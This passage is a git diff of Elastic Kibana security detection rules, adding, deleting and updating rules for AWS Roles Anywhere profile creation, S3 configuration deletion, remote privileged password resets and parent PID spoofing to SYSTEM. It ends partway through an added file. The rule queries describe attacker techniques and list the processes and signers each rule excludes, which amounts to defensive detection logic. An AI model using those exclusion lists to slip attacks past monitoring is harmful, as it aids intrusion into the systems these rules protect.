b/packages/security_detection_engine/kibana/security_rule/1d4ca9c0-ff1e-11ee-91cc-f661ea17fbce_3.json deleted file mode 100644 index ad5a3f04487..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/1d4ca9c0-ff1e-11ee-91cc-f661ea17fbce_3.json +++ /dev/null @@ -1,98 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies the creation of an AWS Roles Anywhere profile. AWS Roles Anywhere is a feature that allows you to use AWS Identity and Access Management (IAM) profiles to manage access to your AWS resources from any location via trusted anchors. This rule detects the creation of a profile that can be assumed from any service. Adversaries may create profiles tied to overly permissive roles to maintain access to AWS resources. Ensure that the profile creation is expected and that the trust policy is configured securely.", - "false_positives": [ - "AWS Roles Anywhere profiles are legitimate profiles that can be created by administrators to allow access from any location. Ensure that the profile created is expected and that the trust policy is configured securely." - ], - "from": "now-30m", - "index": [ - "filebeat-*", - "logs-aws.cloudtrail-*" - ], - "interval": "10m", - "language": "kuery", - "license": "Elastic License v2", - "name": "AWS IAM Roles Anywhere Profile Creation", - "note": "## Triage and analysis\n\n### Investigating AWS IAM Roles Anywhere Profile Creation\n\nThis rule detects the creation of an AWS Roles Anywhere profile. AWS Roles Anywhere allows you to use AWS Identity and Access Management (IAM) profiles to manage access to your AWS resources from any location via trusted anchors. Adversaries may create profiles tied to overly permissive roles to maintain access to AWS resources. It is crucial to ensure that the profile creation is expected and that the trust policy is configured securely.\n\n#### Possible Investigation Steps:\n\n- **Identify the Actor**: Review the `aws.cloudtrail.user_identity.arn` and `aws.cloudtrail.user_identity.access_key_id` fields to identify who created the profile. Verify if this actor typically performs such actions and if they have the necessary permissions.\n- **Review the Request Details**: Examine the `aws.cloudtrail.request_parameters` to understand the specific details of the profile creation. Look for any unusual parameters or overly permissive roles that could suggest unauthorized or malicious activity.\n- **Analyze the Source of the Request**: Investigate the `source.ip` and `source.geo` fields to determine the location and origin of the request. Ensure the request originated from a known and trusted location.\n- **Check the Created Profile\u2019s Permissions**: Review the `roleArns` associated with the created profile. Verify that the roles are appropriate for the user's intended actions and do not grant excessive permissions.\n- **Verify the Profile\u2019s Configuration**: Ensure that the profile's `durationSeconds`, `enabled`, and `tags` are configured according to your organization's security policies. Pay particular attention to any configuration that might allow prolonged access or concealment of activity.\n\n### False Positive Analysis:\n\n- **Legitimate Administrative Actions**: Confirm if the profile creation aligns with scheduled updates, development activities, or legitimate administrative tasks documented in change management systems.\n- **Consistency Check**: Compare the action against historical data of similar actions performed by the user or within the organization. If the action is consistent with past legitimate activities, it might indicate a false alarm.\n- **Verify through Outcomes**: Check the `aws.cloudtrail.response_elements` and the `event.outcome` to confirm if the profile creation was successful and intended according to policy.\n\n### Response and Remediation:\n\n- **Immediate Review and Reversal if Necessary**: If the profile creation was unauthorized, disable or delete the created profile and review the associated roles and permissions for any potential misuse.\n- **Enhance Monitoring and Alerts**: Adjust monitoring systems to alert on similar actions, especially those involving sensitive roles or unexpected locations.\n- **Educate and Train**: Provide additional training to users with administrative rights on the importance of security best practices concerning profile and role management and the risks of unauthorized profile creation.\n- **Audit IAM Policies and Permissions**: Conduct a comprehensive audit of all IAM policies and associated permissions to ensure they adhere to the principle of least privilege.\n- **Incident Response**: If there's an indication of malicious intent or a security breach, initiate the incident response protocol to mitigate any damage and prevent future occurrences.\n\n### Additional Information:\n\nFor further guidance on managing AWS IAM Roles Anywhere profiles and securing AWS environments, refer to the [AWS Roles Anywhere documentation](https://docs.aws.amazon.com/rolesanywhere/latest/userguide/introduction.html) and AWS best practices for security. Additionally, consult the following resources for specific details on profile management and potential abuse:\n- [AWS IAM Roles Anywhere Profile Creation API Reference](https://docs.aws.amazon.com/rolesanywhere/latest/APIReference/API_CreateProfile.html)\n- [Ermetic Blog - Managing Third Party Access](https://ermetic.com/blog/aws/keep-your-iam-users-close-keep-your-third-parties-even-closer-part-1/)\n\n", - "query": "event.dataset:aws.cloudtrail\n and event.provider: rolesanywhere.amazonaws.com\n and event.action: CreateProfile\n and event.outcome: success\n", - "references": [ - "https://docs.aws.amazon.com/rolesanywhere/latest/userguide/introduction.html", - "https://docs.datadoghq.com/security/default_rules/cloudtrail-aws-iam-roles-anywhere-trust-anchor-created/", - "https://ermetic.com/blog/aws/keep-your-iam-users-close-keep-your-third-parties-even-closer-part-1/", - "https://docs.aws.amazon.com/rolesanywhere/latest/APIReference/API_CreateProfile.html" - ], - "related_integrations": [ - { - "integration": "cloudtrail", - "package": "aws", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "1d4ca9c0-ff1e-11ee-91cc-f661ea17fbce", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS IAM", - "Use Case: Identity and Access Audit", - "Tactic: Persistence", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1098", - "name": "Account Manipulation", - "reference": "https://attack.mitre.org/techniques/T1098/", - "subtechnique": [ - { - "id": "T1098.003", - "name": "Additional Cloud Roles", - "reference": "https://attack.mitre.org/techniques/T1098/003/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 3 - }, - "id": "1d4ca9c0-ff1e-11ee-91cc-f661ea17fbce_3", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/21bafdf0-cf17-11ed-bd57-f661ea17fbcc_9.json b/packages/security_detection_engine/kibana/security_rule/21bafdf0-cf17-11ed-bd57-f661ea17fbcc_9.json index d289efe1c8f..6077f00f1aa 100644 --- a/packages/security_detection_engine/kibana/security_rule/21bafdf0-cf17-11ed-bd57-f661ea17fbcc_9.json +++ b/packages/security_detection_engine/kibana/security_rule/21bafdf0-cf17-11ed-bd57-f661ea17fbcc_9.json @@ -31,7 +31,7 @@ "related_integrations": [ { "package": "google_workspace", - "version": "^2.31.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/227dc608-e558-43d9-b521-150772250bae_208.json b/packages/security_detection_engine/kibana/security_rule/227dc608-e558-43d9-b521-150772250bae_208.json deleted file mode 100644 index bb12088c455..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/227dc608-e558-43d9-b521-150772250bae_208.json +++ /dev/null @@ -1,92 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies the deletion of various Amazon Simple Storage Service (S3) bucket configuration components.", - "false_positives": [ - "Bucket components may be deleted by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Bucket component deletions by unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-60m", - "index": [ - "filebeat-*", - "logs-aws.cloudtrail-*" - ], - "interval": "10m", - "language": "kuery", - "license": "Elastic License v2", - "name": "AWS S3 Bucket Configuration Deletion", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating AWS S3 Bucket Configuration Deletion\n\nAmazon S3 is a scalable storage service where configurations like policies, replication, and encryption ensure data security and compliance. Adversaries may delete these configurations to evade defenses, disrupt data protection, or conceal malicious activities. The detection rule monitors successful deletions of these configurations, signaling potential defense evasion attempts by correlating specific CloudTrail events.\n\n### Possible investigation steps\n\n- Review the CloudTrail logs for the specific event.provider:s3.amazonaws.com and event.action values to identify the user or role responsible for the deletion actions.\n- Examine the event.outcome:success field to confirm that the deletion actions were completed successfully and not attempted or failed.\n- Investigate the IAM policies and permissions associated with the user or role identified to determine if they have legitimate access to perform such deletions.\n- Check for any recent changes in IAM roles or policies that might have inadvertently granted excessive permissions.\n- Correlate the timing of the deletion events with other suspicious activities or alerts in the AWS environment to identify potential patterns or coordinated actions.\n- Assess the impact of the deleted configurations on data security and compliance, and determine if any critical data protection mechanisms were affected.\n\n### False positive analysis\n\n- Routine administrative actions by authorized personnel may trigger alerts when they update or remove bucket configurations as part of regular maintenance. To manage this, create exceptions for specific user roles or IAM users known to perform these tasks regularly.\n- Automated scripts or tools used for infrastructure management might delete and recreate bucket configurations as part of their operation. Identify these scripts and exclude their associated actions from triggering alerts by using specific identifiers or tags.\n- Scheduled policy updates or compliance checks that involve temporary removal of configurations can also result in false positives. Implement time-based exceptions for these known activities to prevent unnecessary alerts.\n- Development and testing environments often undergo frequent configuration changes, which can mimic suspicious behavior. Exclude these environments from the rule by using environment-specific tags or identifiers.\n\n### Response and remediation\n\n- Immediately revoke any unauthorized access to the affected S3 bucket by reviewing and updating the bucket's access policies and permissions.\n- Restore the deleted configurations by applying the latest known good configuration settings for policies, replication, encryption, and other affected components.\n- Conduct a thorough audit of recent IAM activity to identify any unauthorized or suspicious actions related to the S3 bucket configurations.\n- Escalate the incident to the security operations team for further investigation and to determine if additional AWS resources or accounts have been compromised.\n- Implement additional monitoring and alerting for any future unauthorized configuration changes to S3 buckets, focusing on the specific actions identified in the detection rule.\n- Review and enhance IAM policies to enforce the principle of least privilege, ensuring only authorized users have the necessary permissions to modify S3 bucket configurations.\n- Coordinate with the incident response team to assess the impact of the configuration deletions on data security and compliance, and take necessary steps to mitigate any identified risks.", - "query": "event.dataset:aws.cloudtrail and event.provider:s3.amazonaws.com and\n event.action:(DeleteBucketPolicy or DeleteBucketReplication or DeleteBucketCors or\n DeleteBucketEncryption or DeleteBucketLifecycle)\n and event.outcome:success\n", - "references": [ - "https://docs.aws.amazon.com/AmazonS3/latest/API/API_DeleteBucketPolicy.html", - "https://docs.aws.amazon.com/AmazonS3/latest/API/API_DeleteBucketReplication.html", - "https://docs.aws.amazon.com/AmazonS3/latest/API/API_DeleteBucketCors.html", - "https://docs.aws.amazon.com/AmazonS3/latest/API/API_DeleteBucketEncryption.html", - "https://docs.aws.amazon.com/AmazonS3/latest/API/API_DeleteBucketLifecycle.html" - ], - "related_integrations": [ - { - "integration": "cloudtrail", - "package": "aws", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "227dc608-e558-43d9-b521-150772250bae", - "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Use Case: Asset Visibility", - "Tactic: Defense Evasion", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1070", - "name": "Indicator Removal", - "reference": "https://attack.mitre.org/techniques/T1070/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 208 - }, - "id": "227dc608-e558-43d9-b521-150772250bae_208", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/26b01043-4f04-4d2f-882a-5a1d2e95751b_11.json b/packages/security_detection_engine/kibana/security_rule/26b01043-4f04-4d2f-882a-5a1d2e95751b_11.json new file mode 100644 index 00000000000..93b3cc3727d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/26b01043-4f04-4d2f-882a-5a1d2e95751b_11.json @@ -0,0 +1,121 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies parent process spoofing used to create an elevated child process. Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Privileges Elevation via Parent Process PID Spoofing", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Privileges Elevation via Parent Process PID Spoofing\n\nParent Process ID (PPID) spoofing is a technique where adversaries manipulate the PPID of a process to disguise its origin, often to bypass security measures or gain elevated privileges. This is particularly concerning in Windows environments where processes can inherit permissions from their parent. The detection rule identifies suspicious process creation patterns, such as unexpected PPID values and elevated user IDs, while filtering out known legitimate processes and trusted signatures, to flag potential privilege escalation attempts.\n\n### Possible investigation steps\n\n- Review the process creation event details, focusing on the process.parent.Ext.real.pid and user.id fields to confirm if the PPID spoofing led to privilege escalation to SYSTEM.\n- Examine the process.executable and process.parent.executable paths to determine if the process is known or expected in the environment, and check against the list of excluded legitimate processes.\n- Investigate the process.code_signature fields to verify if the process is signed by a trusted entity and if the signature is valid, especially if the process is not excluded by the rule.\n- Check the historical activity of the involved user.id and process.parent.executable to identify any unusual patterns or recent changes in behavior.\n- Correlate the alert with other security events or logs to identify any related suspicious activities or potential lateral movement attempts within the network.\n\n### False positive analysis\n\n- Processes related to Windows Error Reporting such as WerFault.exe and Wermgr.exe can trigger false positives. These are legitimate system processes and can be excluded by verifying their signatures and paths.\n- Logon utilities like Utilman.exe spawning processes such as osk.exe, Narrator.exe, or Magnify.exe may appear suspicious but are often legitimate. Exclude these by confirming their usage context and ensuring they are executed by trusted users.\n- Third-party software like TeamViewer, Cisco WebEx, and Dell Inc. may cause false positives due to their legitimate use of process creation. Verify the code signature and trust status to exclude these processes.\n- Windows Update processes involving MpSigStub.exe and wuauclt.exe can be mistakenly flagged. Confirm these are part of regular update activities and exclude them based on their known paths and parent processes.\n- Remote support and management tools such as LogMeIn, GoToAssist, and Chrome Remote Desktop may be flagged. Ensure these are installed and used by authorized personnel and exclude them by their executable paths.\n- Netwrix Corporation's processes like adcrcpy.exe may be flagged if they are part of legitimate auditing activities. Verify the code signature and exclude these processes if they are part of authorized Netwrix Auditor operations.\n\n### Response and remediation\n\n- Isolate the affected system from the network to prevent further unauthorized access or lateral movement by the adversary.\n- Terminate any suspicious processes identified by the alert, especially those with spoofed PPIDs or elevated privileges, to stop potential malicious activities.\n- Review and revoke any unauthorized user accounts or privileges that may have been created or escalated during the incident.\n- Conduct a thorough forensic analysis of the affected system to identify any additional indicators of compromise or persistence mechanisms.\n- Restore the system from a known good backup if necessary, ensuring that all malicious artifacts are removed and system integrity is maintained.\n- Implement additional monitoring and logging on the affected system and network to detect any recurrence of similar activities.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if broader organizational impacts exist.", + "query": "/* This rule is compatible with Elastic Endpoint only */\n\nprocess where host.os.type == \"windows\" and event.action == \"start\" and\n\n /* process creation via seclogon */\n process.parent.Ext.real.pid > 0 and\n\n /* PrivEsc to SYSTEM */\n user.id : \"S-1-5-18\" and\n\n /* Common FPs - evasion via hollowing is possible, should be covered by code injection */\n not process.executable : (\"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\Wermgr.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\Wermgr.exe\",\n \"?:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\Install\\\\securityhealthsetup.exe\") and\n /* Logon Utilities */\n not (process.parent.executable : \"?:\\\\Windows\\\\System32\\\\Utilman.exe\" and\n process.executable : (\"?:\\\\Windows\\\\System32\\\\osk.exe\",\n \"?:\\\\Windows\\\\System32\\\\Narrator.exe\",\n \"?:\\\\Windows\\\\System32\\\\Magnify.exe\",\n \"?:\\\\Windows\\\\System32\\\\VoiceAccess.exe\")) and\n\n not process.parent.executable : \"?:\\\\Windows\\\\System32\\\\AtBroker.exe\" and\n\n not (process.code_signature.subject_name in\n (\"philandro Software GmbH\", \"Freedom Scientific Inc.\", \"TeamViewer Germany GmbH\", \"Projector.is, Inc.\",\n \"TeamViewer GmbH\", \"Cisco WebEx LLC\", \"Dell Inc\") and process.code_signature.trusted == true) and\n\n /* AM_Delta_Patch Windows Update */\n not (process.executable : (\"?:\\\\Windows\\\\System32\\\\MpSigStub.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\MpSigStub.exe\") and\n process.parent.executable : (\"?:\\\\Windows\\\\System32\\\\wuauclt.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\wuauclt.exe\",\n \"?:\\\\Windows\\\\UUS\\\\Packages\\\\Preview\\\\*\\\\wuaucltcore.exe\",\n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\wuauclt.exe\",\n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\wuaucltcore.exe\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\UUS\\\\*\\\\wuaucltcore.exe\")) and\n not (process.executable : (\"?:\\\\Windows\\\\System32\\\\MpSigStub.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\MpSigStub.exe\") and process.parent.executable == null) and\n\n /* Other third party SW */\n not process.parent.executable :\n (\"?:\\\\Program Files (x86)\\\\HEAT Software\\\\HEAT Remote\\\\HEATRemoteServer.exe\",\n \"?:\\\\Program Files (x86)\\\\VisualCron\\\\VisualCronService.exe\",\n \"?:\\\\Program Files\\\\BinaryDefense\\\\Vision\\\\Agent\\\\bds-vision-agent-app.exe\",\n \"?:\\\\Program Files\\\\Tablet\\\\Wacom\\\\WacomHost.exe\",\n \"?:\\\\Program Files (x86)\\\\LogMeIn\\\\x64\\\\LogMeIn.exe\",\n \"?:\\\\Program Files (x86)\\\\EMC Captiva\\\\Captiva Cloud Runtime\\\\Emc.Captiva.WebCaptureRunner.exe\",\n \"?:\\\\Program Files\\\\Freedom Scientific\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\Google\\\\Chrome Remote Desktop\\\\*\\\\remoting_host.exe\",\n \"?:\\\\Program Files (x86)\\\\GoToAssist Remote Support Customer\\\\*\\\\g2ax_comm_customer.exe\") and\n not (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Netwrix Corporation\" and\n process.name : \"adcrcpy.exe\" and process.parent.executable : (\n \"?:\\\\Program Files (x86)\\\\Netwrix Auditor\\\\Active Directory Auditing\\\\Netwrix.ADA.EventCollector.exe\",\n \"?:\\\\Program Files (x86)\\\\Netwrix Auditor\\\\Active Directory Auditing\\\\Netwrix.ADA.Analyzer.exe\",\n \"?:\\\\Netwrix Auditor\\\\Active Directory Auditing\\\\Netwrix.ADA.EventCollector.exe\"\n )\n )\n", + "references": [ + "https://gist.github.com/xpn/a057a26ec81e736518ee50848b9c2cd6", + "https://blog.didierstevens.com/2017/03/20/", + "https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-updateprocthreadattribute", + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^9.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.parent.Ext.real.pid", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "26b01043-4f04-4d2f-882a-5a1d2e95751b", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1134", + "name": "Access Token Manipulation", + "reference": "https://attack.mitre.org/techniques/T1134/", + "subtechnique": [ + { + "id": "T1134.002", + "name": "Create Process with Token", + "reference": "https://attack.mitre.org/techniques/T1134/002/" + }, + { + "id": "T1134.004", + "name": "Parent PID Spoofing", + "reference": "https://attack.mitre.org/techniques/T1134/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 11 + }, + "id": "26b01043-4f04-4d2f-882a-5a1d2e95751b_11", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/26f68dba-ce29-497b-8e13-b4fde1db5a2d_415.json b/packages/security_detection_engine/kibana/security_rule/26f68dba-ce29-497b-8e13-b4fde1db5a2d_415.json index 9bb40f01952..552ec7e10f6 100644 --- a/packages/security_detection_engine/kibana/security_rule/26f68dba-ce29-497b-8e13-b4fde1db5a2d_415.json +++ b/packages/security_detection_engine/kibana/security_rule/26f68dba-ce29-497b-8e13-b4fde1db5a2d_415.json @@ -26,7 +26,7 @@ "related_integrations": [ { "package": "o365", - "version": "^2.11.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/272a6484-2663-46db-a532-ef734bf9a796_210.json b/packages/security_detection_engine/kibana/security_rule/272a6484-2663-46db-a532-ef734bf9a796_210.json index d362ae37842..bf892701ca7 100644 --- a/packages/security_detection_engine/kibana/security_rule/272a6484-2663-46db-a532-ef734bf9a796_210.json +++ b/packages/security_detection_engine/kibana/security_rule/272a6484-2663-46db-a532-ef734bf9a796_210.json @@ -25,7 +25,7 @@ "related_integrations": [ { "package": "o365", - "version": "^2.11.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_210.json b/packages/security_detection_engine/kibana/security_rule/27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_210.json index 5cfb0f919c4..9ac73affacc 100644 --- a/packages/security_detection_engine/kibana/security_rule/27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_210.json +++ b/packages/security_detection_engine/kibana/security_rule/27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_210.json @@ -23,7 +23,7 @@ "related_integrations": [ { "package": "o365", - "version": "^2.11.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_218.json b/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_218.json deleted file mode 100644 index 7620267bbef..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_218.json +++ /dev/null @@ -1,133 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies an attempt to reset a potentially privileged account password remotely. Adversaries may manipulate account passwords to maintain access or evade password duration policies and preserve compromised credentials.", - "false_positives": [ - "Legitimate remote account administration." - ], - "from": "now-9m", - "index": [ - "logs-system.security*", - "logs-windows.forwarded*", - "winlogbeat-*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Account Password Reset Remotely", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Account Password Reset Remotely\n\nRemote password resets are crucial for managing user accounts, especially for privileged users. However, adversaries exploit this by resetting passwords to maintain unauthorized access or bypass security policies. The detection rule identifies suspicious remote password resets by monitoring successful network logins and subsequent password reset actions, focusing on privileged accounts to minimize noise and highlight potential threats.\n\n### Possible investigation steps\n\n- Review the source IP address from the authentication event to determine if it is from a known or trusted network. Investigate any unfamiliar or suspicious IP addresses.\n- Check the winlog.event_data.TargetUserName from the password reset event to confirm if it belongs to a privileged account and verify if the reset was authorized.\n- Correlate the winlog.event_data.SubjectLogonId from both the authentication and password reset events to ensure they are linked and identify the user or process responsible for the actions.\n- Investigate the timing and frequency of similar events to identify patterns or anomalies that may indicate malicious activity.\n- Examine any recent changes or activities associated with the account in question to assess if there are other signs of compromise or unauthorized access.\n\n### False positive analysis\n\n- Routine administrative tasks can trigger false positives when legitimate IT staff reset passwords for maintenance or support. To manage this, create exceptions for known IT personnel or service accounts that frequently perform these actions.\n- Automated scripts or tools used for account management might cause false alerts. Identify and exclude these scripts or tools by their specific account names or IP addresses.\n- Scheduled password resets for compliance or security policies may appear suspicious. Document and exclude these scheduled tasks by their timing and associated accounts.\n- Service accounts with naming conventions similar to privileged accounts might be flagged. Review and adjust the rule to exclude these specific service accounts by refining the naming patterns in the query.\n- Internal network devices or systems that perform regular password resets could be misinterpreted as threats. Whitelist these devices by their IP addresses or hostnames to reduce noise.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further unauthorized access or lateral movement by the adversary.\n- Revoke any active sessions associated with the compromised account to disrupt any ongoing malicious activities.\n- Reset the password of the affected account using a secure method, ensuring it is done from a trusted and secure system.\n- Conduct a thorough review of recent account activities and system logs to identify any additional unauthorized changes or access attempts.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine the scope of the breach.\n- Implement additional monitoring on the affected account and related systems to detect any further suspicious activities.\n- Review and update access controls and privileged account management policies to prevent similar incidents in the future.\n\n## Performance\nThis rule may cause medium to high performance impact due to logic scoping all remote Windows logon activity.\n", - "query": "sequence by winlog.computer_name with maxspan=1m\n [authentication where event.action == \"logged-in\" and\n /* event 4624 need to be logged */\n winlog.logon.type : \"Network\" and event.outcome == \"success\" and source.ip != null and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n not winlog.event_data.TargetUserName : (\"svc*\", \"PIM_*\", \"_*_\", \"*-*-*\", \"*$\")] by winlog.event_data.TargetLogonId\n /* event 4724 need to be logged */\n [iam where event.action == \"reset-password\" and\n (\n /*\n This rule is very noisy if not scoped to privileged accounts, duplicate the\n rule and add your own naming convention and accounts of interest here.\n */\n winlog.event_data.TargetUserName: (\"*Admin*\", \"*super*\", \"*SVC*\", \"*DC0*\", \"*service*\", \"*DMZ*\", \"*ADM*\") or\n winlog.event_data.TargetSid : (\"S-1-5-21-*-500\", \"S-1-12-1-*-500\")\n )\n ] by winlog.event_data.SubjectLogonId\n", - "references": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4724", - "https://stealthbits.com/blog/manipulating-user-passwords-with-mimikatz/", - "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Credential%20Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx", - "https://www.elastic.co/security-labs/detect-credential-access" - ], - "related_integrations": [ - { - "package": "system", - "version": "^1.6.4" - }, - { - "package": "windows", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.ip", - "type": "ip" - }, - { - "ecs": false, - "name": "winlog.computer_name", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.event_data.SubjectLogonId", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.event_data.TargetLogonId", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.event_data.TargetSid", - "type": "unknown" - }, - { - "ecs": false, - "name": "winlog.event_data.TargetUserName", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.logon.type", - "type": "unknown" - } - ], - "risk_score": 47, - "rule_id": "2820c9c2-bcd7-4d6e-9eba-faf3891ba450", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Impact", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1098", - "name": "Account Manipulation", - "reference": "https://attack.mitre.org/techniques/T1098/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0040", - "name": "Impact", - "reference": "https://attack.mitre.org/tactics/TA0040/" - }, - "technique": [ - { - "id": "T1531", - "name": "Account Access Removal", - "reference": "https://attack.mitre.org/techniques/T1531/" - } - ] - } - ], - "type": "eql", - "version": 218 - }, - "id": "2820c9c2-bcd7-4d6e-9eba-faf3891ba450_218", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2d6f5332-42ea-11f0-b09a-f661ea17fbcd_106.json b/packages/security_detection_engine/kibana/security_rule/2d6f5332-42ea-11f0-b09a-f661ea17fbcd_106.json new file mode 100644 index 00000000000..8eabd5d9dc5 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2d6f5332-42ea-11f0-b09a-f661ea17fbcd_106.json @@ -0,0 +1,143 @@ +{ + "attributes": { + "author": [ + 